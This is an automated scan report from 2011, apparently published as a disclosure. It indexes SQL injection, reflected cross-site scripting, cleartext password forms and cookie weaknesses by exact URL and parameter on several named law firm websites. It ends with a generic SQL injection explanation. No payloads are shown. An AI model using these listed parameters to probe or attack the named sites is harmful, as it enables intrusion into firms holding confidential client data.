Lawyers, Dorks, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in Major Law Firms, Personal Information Loss Risks, Unforgivable Vulnerabilities, DORKS

Report generated by CloudScan Vulnerability Crawler at Wed Jan 19 16:24:16 CST 2011.



DORK CWE-79 XSS Report


1. SQL injection

1.1. http://www.ebglaw.com/showoffice.aspx [User-Agent HTTP header]

1.2. http://www.fulbright.com/index.cfm [FUSEACTION parameter]

1.3. http://www.fulbright.com/index.cfm [article_id parameter]

1.4. http://www.fulbright.com/index.cfm [emp_id parameter]

1.5. http://www.fulbright.com/index.cfm [eventID parameter]

1.6. http://www.fulbright.com/index.cfm [fuseaction parameter]

1.7. http://www.fulbright.com/index.cfm [site_id parameter]

2. Cross-site scripting (reflected)

2.1. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

2.2. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]

2.3. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]

2.4. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

2.5. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

2.6. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]

2.7. http://www.arnoldporter.com/practices.cfm [u parameter]

2.8. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]

2.9. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]

2.10. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]

2.11. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]

2.12. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]

2.13. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]

2.14. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]

2.15. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]

2.16. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]

2.17. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]

2.18. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]

2.19. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]

2.20. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]

2.21. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]

2.22. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]

2.23. http://www.cov.com/news/detail.aspx [news parameter]

2.24. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]

2.25. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]

2.26. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]

2.27. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]

2.28. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]

2.29. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]

2.30. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]

2.31. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]

2.32. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]

2.33. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]

2.34. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]

2.35. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

2.36. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

2.37. http://www.fulbright.com/index.cfm [eTitle parameter]

2.38. http://www.fulbright.com/index.cfm [eTitle parameter]

2.39. http://www.fulbright.com/index.cfm [fuseaction parameter]

2.40. http://www.fulbright.com/index.cfm [fuseaction parameter]

2.41. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]

2.42. http://www.fulbright.com/index.cfm [pf parameter]

2.43. http://www.fulbright.com/index.cfm [rss parameter]

2.44. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

2.45. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]

2.46. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]

2.47. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]

2.48. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

2.49. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

2.50. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]

2.51. http://www.wileyrein.com/css/_blog.css [REST URL parameter 1]

2.52. http://www.wileyrein.com/css/_blog.css [REST URL parameter 2]

2.53. http://www.wileyrein.com/css/_list.css [REST URL parameter 1]

2.54. http://www.wileyrein.com/css/_list.css [REST URL parameter 2]

2.55. http://www.wileyrein.com/css/_main.css [REST URL parameter 1]

2.56. http://www.wileyrein.com/css/_main.css [REST URL parameter 2]

2.57. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 1]

2.58. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 2]

2.59. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 1]

2.60. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 2]

2.61. http://www.wileyrein.com/css/_slide.css [REST URL parameter 1]

2.62. http://www.wileyrein.com/css/_slide.css [REST URL parameter 2]

2.63. http://www.wileyrein.com/css/main.css [REST URL parameter 1]

2.64. http://www.wileyrein.com/css/main.css [REST URL parameter 2]

2.65. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 1]

2.66. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 2]

2.67. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 3]

2.68. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 1]

2.69. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 2]

2.70. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 3]

2.71. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 1]

2.72. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 2]

2.73. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 3]

2.74. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 1]

2.75. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 2]

2.76. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 3]

2.77. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 1]

2.78. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 2]

2.79. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 3]

2.80. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 1]

2.81. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 2]

2.82. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 3]

2.83. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 1]

2.84. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 2]

2.85. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 3]

2.86. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 1]

2.87. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 2]

2.88. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 3]

2.89. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 1]

2.90. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 2]

2.91. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 3]

2.92. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 1]

2.93. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 2]

2.94. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 3]

2.95. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 1]

2.96. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 2]

2.97. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 3]

2.98. http://www.wileyrein.com/index.cfm [REST URL parameter 1]

2.99. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]

2.100. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 1]

2.101. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 2]

2.102. http://www.wileyrein.com/js/jquery.js [REST URL parameter 1]

2.103. http://www.wileyrein.com/js/jquery.js [REST URL parameter 2]

2.104. http://www.wileyrein.com/js/menu.js [REST URL parameter 1]

2.105. http://www.wileyrein.com/js/menu.js [REST URL parameter 2]

2.106. http://www.wileyrein.com/js/script.js [REST URL parameter 1]

2.107. http://www.wileyrein.com/js/script.js [REST URL parameter 2]

2.108. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 1]

2.109. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 2]

2.110. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 1]

2.111. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 2]

2.112. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 1]

2.113. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 2]

2.114. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 1]

2.115. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 2]

2.116. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 1]

2.117. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 2]

2.118. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 1]

2.119. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 2]

2.120. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 3]

2.121. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 1]

2.122. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 2]

2.123. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 3]

2.124. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 1]

2.125. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 2]

2.126. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 3]

2.127. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 1]

2.128. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 2]

2.129. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 3]

2.130. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 1]

2.131. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 2]

2.132. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 3]

2.133. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 4]

2.134. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 1]

2.135. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 2]

2.136. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 3]

2.137. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 4]

2.138. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 1]

2.139. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 2]

2.140. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 3]

2.141. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 4]

2.142. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 1]

2.143. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 2]

2.144. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 3]

2.145. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 4]

2.146. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 1]

2.147. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 2]

2.148. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 3]

2.149. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 4]

2.150. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 1]

2.151. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 2]

2.152. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 3]

2.153. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 4]

2.154. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 1]

2.155. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 2]

2.156. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 3]

2.157. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 4]

2.158. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 1]

2.159. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 2]

2.160. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 3]

2.161. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 4]

2.162. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 1]

2.163. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 2]

2.164. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 3]

2.165. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 4]

2.166. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 1]

2.167. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 2]

2.168. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 3]

2.169. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 4]

2.170. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 1]

2.171. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 2]

2.172. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 3]

2.173. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 4]

2.174. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 1]

2.175. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 2]

2.176. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 3]

2.177. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 4]

2.178. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 1]

2.179. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 2]

2.180. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 3]

2.181. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 4]

2.182. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 1]

2.183. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 2]

2.184. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 3]

2.185. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 4]

2.186. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 1]

2.187. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 2]

2.188. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 3]

2.189. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 4]

2.190. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 1]

2.191. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 2]

2.192. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 3]

2.193. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 4]

2.194. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 1]

2.195. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 2]

2.196. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 3]

2.197. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 4]

2.198. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 1]

2.199. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 2]

2.200. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 3]

2.201. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 4]

2.202. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 1]

2.203. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 2]

2.204. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 3]

2.205. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 4]

2.206. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 1]

2.207. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 2]

2.208. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 3]

2.209. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 4]

2.210. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 1]

2.211. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 2]

2.212. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 3]

2.213. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 4]

2.214. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 1]

2.215. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 2]

2.216. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 3]

2.217. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 4]

2.218. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 1]

2.219. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 2]

2.220. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 3]

2.221. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 4]

2.222. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 1]

2.223. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 2]

2.224. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 3]

2.225. http://www.wileyrein.com/x22 [REST URL parameter 1]

2.226. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]

2.227. http://www.arnoldporter.com/ [Referer HTTP header]

2.228. http://www.arnoldporter.com/about_the_firm_diversity_our_values.cfm [Referer HTTP header]

2.229. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm [Referer HTTP header]

2.230. http://www.arnoldporter.com/about_the_firm_recognition.cfm [Referer HTTP header]

2.231. http://www.arnoldporter.com/about_the_firm_recognition_rankings.cfm [Referer HTTP header]

2.232. http://www.arnoldporter.com/about_the_firm_who_we_are.cfm [Referer HTTP header]

2.233. http://www.arnoldporter.com/advisory.cfm [Referer HTTP header]

2.234. http://www.arnoldporter.com/careers.cfm [Referer HTTP header]

2.235. http://www.arnoldporter.com/contact.cfm [Referer HTTP header]

2.236. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

2.237. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

2.238. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

2.239. http://www.arnoldporter.com/global_reach.cfm [Referer HTTP header]

2.240. http://www.arnoldporter.com/globals_disclaimer.cfm [Referer HTTP header]

2.241. http://www.arnoldporter.com/globals_llp_status.cfm [Referer HTTP header]

2.242. http://www.arnoldporter.com/globals_non_discrimination.cfm [Referer HTTP header]

2.243. http://www.arnoldporter.com/globals_operating_status.cfm [Referer HTTP header]

2.244. http://www.arnoldporter.com/globals_privacy_policy.cfm [Referer HTTP header]

2.245. http://www.arnoldporter.com/globals_statement_clients_rights.cfm [Referer HTTP header]

2.246. http://www.arnoldporter.com/home.cfm [Referer HTTP header]

2.247. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

2.248. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

2.249. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

2.250. http://www.arnoldporter.com/news.cfm [Referer HTTP header]

2.251. http://www.arnoldporter.com/offices.cfm [Referer HTTP header]

2.252. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

2.253. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

2.254. http://www.arnoldporter.com/professionals.cfm [Referer HTTP header]

2.255. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

2.256. http://www.arnoldporter.com/remote_access.cfm [Referer HTTP header]

2.257. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

2.258. http://www.arnoldporter.com/sitemap.cfm [Referer HTTP header]

2.259. http://www.fulbright.com/index.cfm [Referer HTTP header]

3. Cleartext submission of password

3.1. http://www.fulbright.com/

3.2. http://www.fulbright.com/index.cfm

3.3. http://www.fulbright.com/insite

3.4. http://www.fulbright.com/insite

3.5. http://www.political.cov.com/

3.6. http://www.skadden.com/alumni/Index.cfm

4. Session token in URL

5. ASP.NET ViewState without MAC enabled

5.1. http://www.cov.com/

5.2. http://www.cov.com/en-US/regions/middle_east/

5.3. http://www.cov.com/favicon.ico

5.4. http://www.cov.com/health_care/health_care_reform/

5.5. http://www.cov.com/industry/financial_services/dodd_frank/

5.6. http://www.cov.com/ja-JP/practice/region.aspx

5.7. http://www.cov.com/ko-KR/practice/region.aspx

5.8. http://www.cov.com/news/detail.aspx

5.9. http://www.cov.com/practice/

5.10. http://www.cov.com/zh-CN/practice/region.aspx

6. Cookie scoped to parent domain

6.1. http://www.fulbright.com/dc

6.2. http://www.fulbright.com/Austin

6.3. http://www.fulbright.com/Denver

6.4. http://www.fulbright.com/London

6.5. http://www.fulbright.com/LosAngeles

6.6. http://www.fulbright.com/Minneapolis

6.7. http://www.fulbright.com/Riyadh

6.8. http://www.fulbright.com/aboutus

6.9. http://www.fulbright.com/alumni

6.10. http://www.fulbright.com/aop

6.11. http://www.fulbright.com/careers

6.12. http://www.fulbright.com/dc/x22

6.13. http://www.fulbright.com/downloads

6.14. http://www.fulbright.com/dubai

6.15. http://www.fulbright.com/favicon.ico

6.16. http://www.fulbright.com/index.cfm

6.17. http://www.fulbright.com/industries

6.18. http://www.fulbright.com/insite

6.19. http://www.fulbright.com/international

6.20. http://www.fulbright.com/jblount

6.21. http://www.fulbright.com/news/act_ticker_xml.cfm

6.22. http://www.fulbright.com/newsTicker.swf

6.23. http://www.fulbright.com/offices

6.24. http://www.fulbright.com/rss

6.25. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm

6.26. http://www.fulbright.com/technology

7. Cookie without HttpOnly flag set

7.1. http://www.arnoldporter.com/

7.2. http://www.ebglaw.com/showoffice.aspx

7.3. http://www.fulbright.com/

7.4. http://www.fulbright.com/dc

7.5. http://www.fulbright.com/index.cfm

7.6. http://www.political.cov.com/

7.7. http://www.wileyrein.com/

7.8. http://jonesdaydiversity.com/

7.9. http://jonesdaydiversity.com/404.aspx

7.10. http://jonesdaydiversity.com/favicon.ico

7.11. http://skaddenpractices.skadden.com/fca/

7.12. http://skaddenpractices.skadden.com/hc/

7.13. http://skaddenpractices.skadden.com/sec/

7.14. http://skaddenpractices.skadden.com/sec/scripts/resize.gif

7.15. http://www.cov.com/

7.16. http://www.cov.com/en-US/regions/middle_east/

7.17. http://www.cov.com/favicon.ico

7.18. http://www.cov.com/health_care/health_care_reform/

7.19. http://www.cov.com/industry/financial_services/dodd_frank/

7.20. http://www.cov.com/ja-JP/practice/region.aspx

7.21. http://www.cov.com/ko-KR/practice/region.aspx

7.22. http://www.cov.com/news/detail.aspx

7.23. http://www.cov.com/practice/

7.24. http://www.cov.com/zh-CN/practice/region.aspx

7.25. http://www.fulbright.com/Austin

7.26. http://www.fulbright.com/Beijing

7.27. http://www.fulbright.com/Dallas

7.28. http://www.fulbright.com/Denver

7.29. http://www.fulbright.com/FAA_adv

7.30. http://www.fulbright.com/HongKong

7.31. http://www.fulbright.com/London

7.32. http://www.fulbright.com/LosAngeles

7.33. http://www.fulbright.com/Minneapolis

7.34. http://www.fulbright.com/Munich

7.35. http://www.fulbright.com/Riyadh

7.36. http://www.fulbright.com/SanAntonio

7.37. http://www.fulbright.com/StLouis

7.38. http://www.fulbright.com/aboutus

7.39. http://www.fulbright.com/alumni

7.40. http://www.fulbright.com/aop

7.41. http://www.fulbright.com/careers

7.42. http://www.fulbright.com/dc/x22

7.43. http://www.fulbright.com/downloads

7.44. http://www.fulbright.com/dubai

7.45. http://www.fulbright.com/favicon.ico

7.46. http://www.fulbright.com/houston

7.47. http://www.fulbright.com/industries

7.48. http://www.fulbright.com/insite

7.49. http://www.fulbright.com/international

7.50. http://www.fulbright.com/jblount

7.51. http://www.fulbright.com/languages

7.52. http://www.fulbright.com/news/act_ticker_xml.cfm

7.53. http://www.fulbright.com/newsTicker.swf

7.54. http://www.fulbright.com/newyork

7.55. http://www.fulbright.com/offices

7.56. http://www.fulbright.com/rss

7.57. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm

7.58. http://www.fulbright.com/technology

7.59. http://www.jonesdaydiversity.com/

7.60. http://www.skadden.com/2011insights.cfm

7.61. http://www.skadden.com/alumni/Index.cfm

7.62. http://www.skadden.com/index.cfm

7.63. http://www.weil.com/

8. Password field with autocomplete enabled

8.1. http://www.fulbright.com/

8.2. http://www.fulbright.com/index.cfm

8.3. http://www.fulbright.com/insite

8.4. http://www.fulbright.com/insite

8.5. http://www.political.cov.com/

8.6. http://www.skadden.com/alumni/Index.cfm

9. Cross-domain Referer leakage

9.1. http://skaddenpractices.skadden.com/sec/index.php

9.2. http://www.arnoldporter.com/events.cfm

9.3. http://www.arnoldporter.com/multimedia.cfm

9.4. http://www.arnoldporter.com/publications.cfm

9.5. http://www.ebglaw.com/showoffice.aspx

9.6. http://www.fulbright.com/index.cfm

9.7. http://www.fulbright.com/index.cfm

9.8. http://www.skadden.com/2011insights.cfm

9.9. http://www.skadden.com/alumni/Index.cfm

9.10. http://www.skadden.com/index.cfm

10. Cross-domain script include

10.1. http://www.ebglaw.com/404.aspx

10.2. http://www.ebglaw.com/showoffice.aspx

10.3. http://www.skadden.com/

10.4. http://www.skadden.com/2011insights.cfm

10.5. http://www.skadden.com/alumni/Index.cfm

10.6. http://www.skadden.com/index.cfm

10.7. http://www.weil.com/

10.8. http://www.wileyrein.com/

10.9. http://www.wileyrein.com/index.cfm

10.10. http://www.wileyrein.com/x22

11. Email addresses disclosed

11.1. http://skaddenpractices.skadden.com/fca/

11.2. http://skaddenpractices.skadden.com/hc/

11.3. http://skaddenpractices.skadden.com/sec/index.php

11.4. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm

11.5. http://www.arnoldporter.com/events.cfm

11.6. http://www.arnoldporter.com/globals_privacy_policy.cfm

11.7. http://www.cov.com/en-US/regions/middle_east/

11.8. http://www.cov.com/health_care/health_care_reform/

11.9. http://www.cov.com/industry/financial_services/dodd_frank/

11.10. http://www.cov.com/ja-JP/practice/region.aspx

11.11. http://www.cov.com/ko-KR/practice/region.aspx

11.12. http://www.cov.com/zh-CN/practice/region.aspx

11.13. http://www.ebglaw.com/js/jquery.mousewheel.js

11.14. http://www.ebglaw.com/showoffice.aspx

11.15. http://www.fulbright.com/aop

11.16. http://www.fulbright.com/fjLib/js/prototype.js

11.17. http://www.fulbright.com/index.cfm

11.18. http://www.fulbright.com/industries

11.19. http://www.political.cov.com/

11.20. http://www.skadden.com/Index.cfm

11.21. http://www.wileyrein.com/js/script.js

12. HTML does not specify charset

12.1. http://skaddenpractices.skadden.com/

12.2. http://skaddenpractices.skadden.com/sec/images/tools_doc.gif

12.3. http://skaddenpractices.skadden.com/sec/images/tools_mail.gif

12.4. http://skaddenpractices.skadden.com/sec/images/tools_phone.gif

12.5. http://skaddenpractices.skadden.com/sec/scripts/resize.gif

12.6. http://www.fulbright.com/index.cfm

13. HTML uses unrecognised charset

13.1. http://www.ebglaw.com/404.aspx

13.2. http://www.ebglaw.com/showoffice.aspx

14. Content type incorrectly stated

14.1. http://www.arnoldporter.com//images/iTunesButton.jpg

14.2. http://www.fulbright.com/index.cfm



1. SQL injection
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

